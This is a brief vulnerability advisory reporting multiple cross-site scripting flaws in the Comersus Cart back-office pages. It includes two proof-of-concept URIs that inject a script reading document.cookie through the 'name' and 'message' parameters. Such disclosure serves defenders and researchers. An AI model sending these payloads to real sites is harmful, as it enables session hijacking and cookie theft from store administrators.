Comersus Open Technologies Comersus Cart Multiple Cross-Site Scripting Vulnerabilities

Comersus Open Technologies Comersus Cart Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/backofficetest/backOfficePlus/comersus_backoffice_listAssignedPricesToCustomer.asp?idCustomer=7&name=><script>alert(document.cookie);</script>
http://www.example.com/backofficetest/backOfficePlus/comersus_backoffice_message.asp?message=><script>alert(document.cookie);</script>